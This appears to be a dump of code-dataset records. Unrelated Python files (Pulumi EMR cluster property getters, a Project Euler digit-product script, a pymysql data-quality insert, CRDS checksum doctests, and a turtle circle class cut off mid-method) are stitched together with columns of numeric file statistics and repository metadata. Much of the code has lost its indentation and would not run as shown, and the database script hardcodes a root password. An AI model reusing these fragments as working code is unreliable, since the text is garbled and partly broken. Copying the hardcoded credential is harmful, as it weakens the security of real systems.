return pulumi.get(self, "keep_job_flow_alive")
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> pulumi.Output[Optional[str]]:
"""
The path to the Amazon S3 location where logs for this cluster are stored.
"""
return pulumi.get(self, "log_uri")
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> pulumi.Output[Optional[str]]:
"""
EMR Managed Security group that will be set to the primary instance group.
"""
return pulumi.get(self, "managed_primary_security_group")
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> pulumi.Output[Optional[str]]:
"""
EMR Managed Security group that will be set to the replica instance group.
"""
return pulumi.get(self, "managed_replica_security_group")
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarMasterEbsBlockDevice']]]:
"""
This determines the ebs configuration for your master group instances. Only a single block is allowed.
"""
return pulumi.get(self, "master_ebs_block_devices")
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "master_ebs_optimized")
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the master nodes.
"""
return pulumi.get(self, "master_instance_types")
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> pulumi.Output[Optional[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The application name.
"""
return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="outputClusterId")
    def output_cluster_id(self) -> pulumi.Output[str]:
        """
        The cluster id made available as a provider output; presumably populated when `expose_cluster_id` is set — confirm against provider docs.
        """
        return pulumi.get(self, "output_cluster_id")
    @property
    @pulumi.getter(name="provisioningTimeout")
    def provisioning_timeout(self) -> pulumi.Output[Optional['outputs.MrScalarProvisioningTimeout']]:
        """
        Provisioning timeout configuration; `retries` governs what happens when this timeout is exceeded.
        """
        return pulumi.get(self, "provisioning_timeout")
@property
@pulumi.getter
def region(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler region.
"""
return pulumi.get(self, "region")
    @property
    @pulumi.getter(name="releaseLabel")
    def release_label(self) -> pulumi.Output[Optional[str]]:
        """
        The EMR release label. NOTE(review): description inferred from the name; confirm against provider docs.
        """
        return pulumi.get(self, "release_label")
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> pulumi.Output[Optional[str]]:
"""
Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
"""
return pulumi.get(self, "repo_upgrade_on_boot")
@property
@pulumi.getter
def retries(self) -> pulumi.Output[Optional[int]]:
"""
Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
"""
return pulumi.get(self, "retries")
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarScheduledTask']]]:
"""
An array of scheduled tasks.
"""
return pulumi.get(self, "scheduled_tasks")
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> pulumi.Output[Optional[str]]:
"""
The name of the security configuration applied to the cluster.
"""
return pulumi.get(self, "security_config")
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> pulumi.Output[Optional[str]]:
"""
The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
"""
return pulumi.get(self, "service_access_security_group")
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> pulumi.Output[Optional[str]]:
"""
The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
"""
return pulumi.get(self, "service_role")
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarStepsFile']]]:
"""
Steps from S3.
"""
return pulumi.get(self, "steps_files")
@property
@pulumi.getter
def strategy(self) -> pulumi.Output[str]:
"""
The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
"""
return pulumi.get(self, "strategy")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTag']]]:
"""
A list of tags to assign to the resource. You may define multiple tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> pulumi.Output[Optional[int]]:
"""
amount of instances in task group.
"""
return pulumi.get(self, "task_desired_capacity")
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskEbsBlockDevice']]]:
"""
This determines the ebs configuration for your task group instances. Only a single block is allowed.
"""
return pulumi.get(self, "task_ebs_block_devices")
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "task_ebs_optimized")
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the task nodes.
"""
return pulumi.get(self, "task_instance_types")
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "task_lifecycle")
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> pulumi.Output[Optional[int]]:
"""
maximal amount of instances in task group.
"""
return pulumi.get(self, "task_max_size")
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> pulumi.Output[Optional[int]]:
"""
The minimal amount of instances in task group.
"""
return pulumi.get(self, "task_min_size")
    @property
    @pulumi.getter(name="taskScalingDownPolicies")
    def task_scaling_down_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskScalingDownPolicy']]]:
        """
        Scaling-down policies for the task group. NOTE(review): description inferred from the name; confirm against provider docs.
        """
        return pulumi.get(self, "task_scaling_down_policies")
    @property
    @pulumi.getter(name="taskScalingUpPolicies")
    def task_scaling_up_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskScalingUpPolicy']]]:
        """
        Scaling-up policies for the task group. NOTE(review): description inferred from the name; confirm against provider docs.
        """
        return pulumi.get(self, "task_scaling_up_policies")
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> pulumi.Output[Optional[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "task_unit")
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTerminationPolicy']]]:
"""
Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
"""
return pulumi.get(self, "termination_policies")
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
return pulumi.get(self, "termination_protected")
    @property
    @pulumi.getter(name="visibleToAllUsers")
    def visible_to_all_users(self) -> pulumi.Output[Optional[bool]]:
        """
        Deprecated. This field has been removed from the API and is no longer functional
        (setting it at resource creation emits a DeprecationWarning).
        """
        return pulumi.get(self, "visible_to_all_users")
| 52.88346
| 338
| 0.679738
| 20,281
| 174,251
| 5.583699
| 0.024703
| 0.098399
| 0.090769
| 0.056736
| 0.98218
| 0.978877
| 0.973817
| 0.969358
| 0.96602
| 0.95145
| 0
| 0.003353
| 0.217807
| 174,251
| 3,294
| 339
| 52.899514
| 0.827496
| 0.321548
| 0
| 0.934283
| 1
| 0
| 0.159154
| 0.083826
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16977
| false
| 0.000548
| 0.003834
| 0.014239
| 0.275466
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6398ccc3c667be7698d1809b95c494572f689685
| 1,268
|
py
|
Python
|
08.py
|
brianfl/project-euler
|
9f83a3c2da04fd0801a4a575081add665edccd5f
|
[
"MIT"
] | null | null | null |
08.py
|
brianfl/project-euler
|
9f83a3c2da04fd0801a4a575081add665edccd5f
|
[
"MIT"
] | null | null | null |
08.py
|
brianfl/project-euler
|
9f83a3c2da04fd0801a4a575081add665edccd5f
|
[
"MIT"
] | null | null | null |
# Project Euler problem 8: find the greatest product of thirteen adjacent
# digits in the 1000-digit number below.
long_number = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"

def largest_window_product(digits, width):
    """Return the largest product of `width` adjacent digits in `digits`.

    Generalizes the original script: the number of sliding positions is
    derived from len(digits) rather than the hard-coded literal 988
    (= 1000 - 13 + 1), so this works for any digit string and any window.
    Returns 0 when `width` exceeds len(digits) (no window fits).
    """
    best = 0
    for start in range(len(digits) - width + 1):
        product = 1
        for digit in digits[start:start + width]:
            product *= int(digit)
        best = max(best, product)
    return best

print(largest_window_product(long_number, 13))  # 23514624000
| 105.666667
| 1,016
| 0.932177
| 41
| 1,268
| 28.609756
| 0.536585
| 0.047741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.840759
| 0.044164
| 1,268
| 12
| 1,017
| 105.666667
| 0.127063
| 0.008675
| 0
| 0
| 0
| 0
| 0.796178
| 0.796178
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
63b23605e301a71e7c5288370291d963f9333dd6
| 3,479
|
py
|
Python
|
other_scripts/check_status.py
|
seyros/python_training
|
15a5a3fa471d8ff63ccdd03c13bd09997a8b5794
|
[
"Apache-2.0"
] | null | null | null |
other_scripts/check_status.py
|
seyros/python_training
|
15a5a3fa471d8ff63ccdd03c13bd09997a8b5794
|
[
"Apache-2.0"
] | null | null | null |
other_scripts/check_status.py
|
seyros/python_training
|
15a5a3fa471d8ff63ccdd03c13bd09997a8b5794
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = 'ivanov'
import pymysql
# Connect to the database.
connection = pymysql.connect(host="localhost", user="root", passwd="1112223334", db="testdb", charset='utf8', cursorclass=pymysql.cursors.DictCursor)
try:
    with connection.cursor() as cursor:
        # Create a new record: insert one CHECK_STATUS row of data-quality
        # counters (duplicate keys, row count, NULL counts per column, zero
        # counts, and averages) computed from today's CHECK_OBJECT rows.
        # Each sub-select filters on LOAD_DATE = CURDATE().
        sql = "INSERT INTO CHECK_STATUS " \
              "(ID, LOAD_DATE, NONUNIQ_COUNT, ROW_COUNT, IDNULL_COUNT, IVNULL_COUNT, FVNULL_COUNT, CVNULL_COUNT, DVNULL_COUNT, IDZERO_COUNT, IVZERO_COUNT, FVZERO_COUNT, AV_INT_VALUE, AV_FLOAT_VALUE)" \
              " VALUES (" \
              "NULL," \
              "CURDATE()," \
              "(select count(*) from CHECK_OBJECT WHERE CONCAT(ID,INT_VALUE) IN " \
              "(select * from (SELECT CONCAT(ID,INT_VALUE) AS CC FROM CHECK_OBJECT GROUP BY CC HAVING COUNT(*) > 1) subquary" \
              " WHERE CC is not null) AND LOAD_DATE = CURDATE())," \
              "(select count(*) from CHECK_OBJECT where LOAD_DATE = CURDATE())," \
              "(select count(*) from CHECK_OBJECT where ID is NULL AND LOAD_DATE = CURDATE())," \
              "(select count(*) from CHECK_OBJECT where INT_VALUE is NULL AND LOAD_DATE = CURDATE())," \
              "(select count(*) from CHECK_OBJECT where FLOAT_VALUE is NULL AND LOAD_DATE = CURDATE())," \
              "(select count(*) from CHECK_OBJECT where CHAR_VALUE is NULL AND LOAD_DATE = CURDATE())," \
              "(select count(*) from CHECK_OBJECT where DATE_VALUE is NULL AND LOAD_DATE = CURDATE())," \
              "(select count(*) from CHECK_OBJECT where ID = 0 AND LOAD_DATE = CURDATE())," \
              "(select count(*) from CHECK_OBJECT where INT_VALUE = 0 AND LOAD_DATE = CURDATE())," \
              "(select count(*) from CHECK_OBJECT where FLOAT_VALUE = 0 AND LOAD_DATE = CURDATE())," \
              "(select AVG(INT_VALUE) from CHECK_OBJECT where LOAD_DATE = CURDATE())," \
              "(select AVG(FLOAT_VALUE) from CHECK_OBJECT where LOAD_DATE = CURDATE()))"
        cursor.execute(sql)
    connection.commit()
# Close the database connection.
finally:
    connection.close()
| 89.205128
| 1,360
| 0.678068
| 477
| 3,479
| 4.72327
| 0.176101
| 0.092321
| 0.173103
| 0.213049
| 0.869063
| 0.869063
| 0.869063
| 0.869063
| 0.869063
| 0.869063
| 0
| 0.007233
| 0.205231
| 3,479
| 39
| 1,361
| 89.205128
| 0.807595
| 0.416786
| 0
| 0
| 0
| 0.071429
| 0.676383
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.035714
| 0.035714
| 0
| 0.035714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
63bce965f7a1533a26e799f32a00a0a7b1005f81
| 135
|
py
|
Python
|
img_transforms.py
|
martinpflaum/image-augmentation-with-point-clouds
|
453947520bd74a0b7ae959c1b59e9776b9dfe7a2
|
[
"MIT"
] | null | null | null |
img_transforms.py
|
martinpflaum/image-augmentation-with-point-clouds
|
453947520bd74a0b7ae959c1b59e9776b9dfe7a2
|
[
"MIT"
] | null | null | null |
img_transforms.py
|
martinpflaum/image-augmentation-with-point-clouds
|
453947520bd74a0b7ae959c1b59e9776b9dfe7a2
|
[
"MIT"
] | null | null | null |
import random
from torchvision.transforms import functional as F
from torchvision.transforms import transforms
from PIL import Image
| 33.75
| 51
| 0.851852
| 18
| 135
| 6.388889
| 0.555556
| 0.26087
| 0.434783
| 0.53913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 135
| 4
| 52
| 33.75
| 0.982906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
898370d5e67056fc24a2ff2429d8f2a713ae1d63
| 9,153
|
py
|
Python
|
crds/tests/test_checksum.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | null | null | null |
crds/tests/test_checksum.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | 1
|
2019-04-11T18:19:16.000Z
|
2019-04-11T18:19:16.000Z
|
crds/tests/test_checksum.py
|
sean-lockwood/crds
|
f071f59deca98aac4bee04d688805a127761f3d2
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import shutil
import doctest
from crds.core import log, utils
from crds import tests, data_file
from crds.tests import test_config
from crds.refactoring import checksum
from crds.refactoring.checksum import ChecksumScript
# Doctest container: ChecksumScript adds CHECKSUM/DATASUM to a FITS copy,
# then verifies them. (Docstring is an executable doctest — do not edit.)
def dt_checksum_script_fits_add():
    """
    >>> old_state = test_config.setup()
    >>> _ = shutil.copy("data/s7g1700gl_dead.fits", "added.fits")
    >>> header = data_file.get_header("./added.fits")
    >>> assert "CHECKSUM" not in header
    >>> assert "DATASUM" not in header
    >>> ChecksumScript("crds.refactor.checksum ./added.fits")() # doctest: +ELLIPSIS
    CRDS - INFO - Adding checksum for './added.fits'
    0
    >>> utils.clear_function_caches()
    >>> header = data_file.get_header("./added.fits")
    >>> assert "CHECKSUM" in header
    >>> assert "DATASUM" in header
    >>> ChecksumScript("crds.refactor.checksum --verify ./added.fits")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for './added.fits'
    0
    >>> os.remove("added.fits")
    >>> test_config.cleanup(old_state)
    """
# Doctest container: ChecksumScript strips CHECKSUM/DATASUM from a FITS copy.
def dt_checksum_script_fits_remove():
    """
    >>> old_state = test_config.setup()
    >>> _ = shutil.copy("data/s7g1700gl_dead_good_xsum.fits", "removed.fits")
    >>> header = data_file.get_header("./removed.fits")
    >>> assert "CHECKSUM" in header
    >>> assert "DATASUM" in header
    >>> ChecksumScript("crds.refactor.checksum --remove ./removed.fits")() # doctest: +ELLIPSIS
    CRDS - INFO - Removing checksum for './removed.fits'
    0
    >>> utils.clear_function_caches()
    >>> header = data_file.get_header("./removed.fits")
    >>> assert "CHECKSUM" not in header
    >>> assert "DATASUM" not in header
    >>> ChecksumScript("crds.refactor.checksum --verify ./removed.fits")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for './removed.fits'
    0
    >>> os.remove("removed.fits")
    >>> test_config.cleanup(old_state)
    """
# Doctest container: verifying a FITS file with valid checksums succeeds (exit 0).
def dt_checksum_script_fits_verify_good():
    """
    >>> old_state = test_config.setup()
    >>> _ = shutil.copy("data/s7g1700gl_dead_good_xsum.fits", "verify_good.fits")
    >>> header = data_file.get_header("verify_good.fits")
    >>> header["CHECKSUM"]
    'i2PMi1MJi1MJi1MJ'
    >>> header["DATASUM"]
    '0'
    >>> ChecksumScript("crds.refactor.checksum --verify ./verify_good.fits")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for './verify_good.fits'
    0
    >>> os.remove("verify_good.fits")
    >>> test_config.cleanup(old_state)
    """
# Doctest container: verifying a FITS file with bad checksums warns but still exits 0.
def dt_checksum_script_fits_verify_bad():
    """
    >>> old_state = test_config.setup()
    >>> _ = shutil.copy("data/s7g1700gl_dead_bad_xsum.fits", "./verify_bad.fits")
    >>> ChecksumScript("crds.refactor.checksum --verify ./verify_bad.fits")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for './verify_bad.fits'
    CRDS - WARNING - AstropyUserWarning : astropy.io.fits.hdu.base : Checksum verification failed for HDU ('', 1).
    CRDS - WARNING - AstropyUserWarning : astropy.io.fits.hdu.base : Datasum verification failed for HDU ('', 1).
    0
    >>> os.remove("verify_bad.fits")
    >>> test_config.cleanup(old_state)
    """
# ----------------------------------------------------------------------
# Doctest container: verifying a mapping (.pmap) with a valid sha1sum succeeds.
def dt_checksum_script_rmap_verify_good():
    """
    >>> old_state = test_config.setup()
    >>> ChecksumScript("crds.refactor.checksum --verify data/hst.pmap")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for 'data/hst.pmap'
    0
    >>> test_config.cleanup(old_state)
    """
# Doctest container: adding a checksum to an rmap with a bad sha1sum repairs it.
def dt_checksum_script_rmap_add_bad():
    """
    >>> old_state = test_config.setup()
    >>> _ = shutil.copy("data/hst-bad-xsum.rmap", "./add_bad.rmap")
    >>> ChecksumScript("crds.refactor.checksum ./add_bad.rmap")() # doctest: +ELLIPSIS
    CRDS - INFO - Adding checksum for './add_bad.rmap'
    0
    >>> ChecksumScript("crds.refactor.checksum --verify ./add_bad.rmap")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for './add_bad.rmap'
    0
    >>> os.remove("add_bad.rmap")
    >>> test_config.cleanup(old_state)
    """
# Doctest container: verifying an rmap with a bad sha1sum fails (exit 1).
def dt_checksum_script_rmap_verify_bad():
    """
    >>> old_state = test_config.setup()
    >>> _ = shutil.copy("data/hst-bad-xsum.rmap", "./verify_bad.rmap")
    >>> ChecksumScript("crds.refactor.checksum --verify ./verify_bad.rmap")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for './verify_bad.rmap'
    CRDS - ERROR - Checksum operation FAILED : sha1sum mismatch in 'verify_bad.rmap'
    1
    >>> os.remove("verify_bad.rmap")
    >>> test_config.cleanup(old_state)
    """
# Doctest container: mapping checksums cannot be removed — operation fails (exit 1).
def dt_checksum_script_rmap_remove_bad():
    """
    >>> old_state = test_config.setup()
    >>> _ = shutil.copy("data/hst-bad-xsum.rmap", "./remove_bad.rmap")
    >>> ChecksumScript("crds.refactor.checksum --remove ./remove_bad.rmap")() # doctest: +ELLIPSIS
    CRDS - INFO - Removing checksum for './remove_bad.rmap'
    CRDS - ERROR - Checksum operation FAILED : Mapping checksums cannot be removed for: './remove_bad.rmap'
    1
    >>> os.remove("remove_bad.rmap")
    >>> test_config.cleanup(old_state)
    """
# Doctest container: verifying an rmap with no sha1sum present fails (exit 1).
def dt_checksum_script_rmap_verify_missing():
    """
    >>> old_state = test_config.setup()
    >>> _ = shutil.copy("data/hst-missing-xsum.rmap", "./verify_missing.rmap")
    >>> ChecksumScript("crds.refactor.checksum --verify ./verify_missing.rmap")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for './verify_missing.rmap'
    CRDS - ERROR - Checksum operation FAILED : sha1sum is missing in 'verify_missing.rmap'
    1
    >>> os.remove("verify_missing.rmap")
    >>> test_config.cleanup(old_state)
    """
# Doctest container: add/remove/verify are all unsupported for ASDF files (exit 1 each).
def dt_checksum_script_unsupported_asdf():
    """
    >>> old_state = test_config.setup()
    >>> ChecksumScript("crds.refactor.checksum data/valid.asdf")() # doctest: +ELLIPSIS
    CRDS - INFO - Adding checksum for 'data/valid.asdf'
    CRDS - ERROR - Failed updating checksum for 'data/valid.asdf' : Method 'add_checksum' is not supported for file format 'ASDF'
    1
    >>> ChecksumScript("crds.refactor.checksum --remove data/valid.asdf")() # doctest: +ELLIPSIS
    CRDS - INFO - Removing checksum for 'data/valid.asdf'
    CRDS - ERROR - Checksum operation FAILED : Method 'remove_checksum' is not supported for file format 'ASDF'
    1
    >>> ChecksumScript("crds.refactor.checksum --verify data/valid.asdf")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for 'data/valid.asdf'
    CRDS - ERROR - Checksum operation FAILED : Method 'verify_checksum' is not supported for file format 'ASDF'
    1
    >>> test_config.cleanup(old_state)
    """
# Doctest container: add/remove/verify are all unsupported for JSON files (exit 1 each).
def dt_checksum_script_unsupported_json():
    """
    >>> old_state = test_config.setup()
    >>> ChecksumScript("crds.refactor.checksum data/valid.json")() # doctest: +ELLIPSIS
    CRDS - INFO - Adding checksum for 'data/valid.json'
    CRDS - ERROR - Failed updating checksum for 'data/valid.json' : Method 'add_checksum' is not supported for file format 'JSON'
    1
    >>> ChecksumScript("crds.refactor.checksum --remove data/valid.json")() # doctest: +ELLIPSIS
    CRDS - INFO - Removing checksum for 'data/valid.json'
    CRDS - ERROR - Checksum operation FAILED : Method 'remove_checksum' is not supported for file format 'JSON'
    1
    >>> ChecksumScript("crds.refactor.checksum --verify data/valid.json")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for 'data/valid.json'
    CRDS - ERROR - Checksum operation FAILED : Method 'verify_checksum' is not supported for file format 'JSON'
    1
    >>> test_config.cleanup(old_state)
    """
# Doctest container: checksum operations on an opaque text file are rejected.
# NOTE(review): the --remove case uses 'ddata/opaque_fts.tmp' (doubled 'd') —
# looks like a typo for 'data/...', but the expected output below matches it,
# so the doctest is self-consistent as written; confirm intent before fixing.
def dt_checksum_script_unsupported_text():
    """
    >>> old_state = test_config.setup()
    >>> ChecksumScript("crds.refactor.checksum data/opaque_fts.tmp")() # doctest: +ELLIPSIS
    CRDS - INFO - Adding checksum for 'data/opaque_fts.tmp'
    CRDS - ERROR - Checksum operation FAILED : File 'data/opaque_fts.tmp' does not appear to be a CRDS reference or mapping file.
    1
    >>> ChecksumScript("crds.refactor.checksum --remove ddata/opaque_fts.tmp")() # doctest: +ELLIPSIS
    CRDS - INFO - Removing checksum for 'ddata/opaque_fts.tmp'
    CRDS - ERROR - Checksum operation FAILED : File 'ddata/opaque_fts.tmp' does not appear to be a CRDS reference or mapping file.
    1
    >>> ChecksumScript("crds.refactor.checksum --verify data/opaque_fts.tmp")() # doctest: +ELLIPSIS
    CRDS - INFO - Verifying checksum for 'data/opaque_fts.tmp'
    CRDS - ERROR - Checksum operation FAILED : File 'data/opaque_fts.tmp' does not appear to be a CRDS reference or mapping file.
    1
    >>> test_config.cleanup(old_state)
    """
def test():
    """Run this module's doctests and return the doctest failure count.

    setup() and cleanup() are performed inline inside each docstring above
    because bracketing them here would hide the tests from nose discovery;
    combining everything into one giant docstring works but is hard to
    analyze and debug when things go wrong.
    """
    from crds.tests import tstmod
    from crds.tests import test_checksum
    return tstmod(test_checksum)
# Allow running the doctest suite directly; prints the failure count.
if __name__ == "__main__":
    print(test())
| 39.623377
| 131
| 0.662843
| 1,123
| 9,153
| 5.230632
| 0.120214
| 0.044263
| 0.092952
| 0.121553
| 0.846101
| 0.806946
| 0.758597
| 0.657984
| 0.57729
| 0.451992
| 0
| 0.006741
| 0.189665
| 9,153
| 230
| 132
| 39.795652
| 0.785223
| 0.813285
| 0
| 0
| 0
| 0
| 0.008282
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.52
| true
| 0
| 0.36
| 0
| 0.92
| 0.04
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
89bec5ceb25cd9718ad4b6c93d9467f0e3ef9ba6
| 34,847
|
py
|
Python
|
scripts/python/turtleRelated/circleint.py
|
jeremiahmarks/dangerzone
|
fe2946b8463ed018d2136ca0eb178161ad370565
|
[
"MIT"
] | 1
|
2015-08-15T05:25:35.000Z
|
2015-08-15T05:25:35.000Z
|
scripts/python/turtleRelated/circleint.py
|
jeremiahmarks/dangerzone
|
fe2946b8463ed018d2136ca0eb178161ad370565
|
[
"MIT"
] | null | null | null |
scripts/python/turtleRelated/circleint.py
|
jeremiahmarks/dangerzone
|
fe2946b8463ed018d2136ca0eb178161ad370565
|
[
"MIT"
] | null | null | null |
import math
import fvh2, fvh
import supercircle
# Global registry of grid-snapped (x, y, r) keys for every Circle created,
# used to avoid drawing near-duplicate circles.
masterCircleSet=set()
# Diagnostic counters: constructions of Circle and calls to checkCircles.
circlecalled = 0
checkcirclescalled = 0
# Grid cell size used to snap circle centers when de-duplicating.
MINOFFSET=5
class Circle():
    """A turtle-drawn circle registered in the module-wide masterCircleSet.

    NOTE(review): this module is Python 2 code (tuple-parameter signatures
    and `print` statements appear elsewhere in the file); the expression
    `int(x)/MINOFFSET*MINOFFSET` below relies on Python 2 integer division
    to snap coordinates to a MINOFFSET grid.
    """
    def __init__(self,x,y,r,lm=None, keep=True):
        # Count every construction for module-level diagnostics.
        global circlecalled
        circlecalled+=1
        self.keep = keep
        self.center=(x,y)
        self.radius=r
        # Grid-snapped identity used to de-duplicate circles globally.
        self.checkString=(int(x)/MINOFFSET*MINOFFSET,int(y)/MINOFFSET*MINOFFSET,r)
        masterCircleSet.add(self.checkString)
        self.color="black"
        if not lm:
            # No shared turtle supplied: make one with animation tracing off.
            self.lm=fvh2.fvh.MyTurtle()
            self.lm.tracer(False)
        else:
            self.lm=lm
        #self.draw()
    def draw(self):
        """Draw the circle in its current color; undo the strokes if keep is False."""
        #self.lm=fvh2.fvh.MyTurtle()
        self.lm.pencolor(self.color)
        self.lm.setup()
        self.lm.penup()
        fvh2.circlearound(self.center, self.radius,self.lm)
        if not self.keep:
            self.lm.undo()
            self.lm.undo()
    def drawred(self):
        """Draw the circle outline in red (debugging aid)."""
        self.lm.pencolor('red')
        self.lm.penup()
        fvh2.circlearound(self.center, self.radius,self.lm)
    def drawwhite(self):
        """Draw the circle outline in white (erases on a white background)."""
        self.lm.pencolor('white')
        self.lm.penup()
        fvh2.circlearound(self.center, self.radius,self.lm)
    def setcolor(self, color):
        """Set the pen color used by subsequent draw() calls."""
        self.color=color
    def realCards(self):
        """Place four half-radius circles on the rim, 90 degrees apart."""
